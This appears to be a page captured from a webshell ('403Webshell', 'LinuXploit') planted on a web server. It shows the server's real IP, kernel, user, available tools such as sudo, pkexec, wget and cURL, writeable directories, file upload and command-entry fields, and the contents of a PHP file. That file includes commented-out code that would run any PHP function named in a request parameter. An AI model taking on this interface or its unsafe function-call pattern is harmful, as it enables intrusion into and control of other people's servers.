403Webshell
Server IP : 37.9.174.138  /  Your IP : 216.73.216.117
Web Server : Apache
System : Linux vps6.backend.sk 6.12.100+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.100-1 (2026-07-30) x86_64
User : ftpuser ( 1001)
PHP Version : 8.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ttjs.cz/dev/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/ttjs.cz/dev/devutils.php
<?php

printVarsArray("state=ACTIVE&type=ADMINISTRATOR&street=R%C3%A1zusova+25&ico=Ko%C5%A1ick%C3%BD+kraj&street=R%C3%A1zusova+25&street_number=5&zip=040+11&price_lists_id=2&pays=ADMINISTRATOR&invoices=ADMINISTRATOR&note=%5Bl&id=&last_update=");

//$function = $_GET['function'];
//$arg1 = $_GET['arg1'];
//
//$function(urldecode($arg1));

function printVarsArray($urlEncoded) {
    $vars = array();
    $items = explode("&", $urlEncoded);
    foreach ($items as $item) {
        $break = explode("=", $item);
        $vars[] = $break[0];
    }
    echo '"' . implode('", "', $vars) . '"';
}


Youez - 2016 - github.com/yon3zu
LinuXploit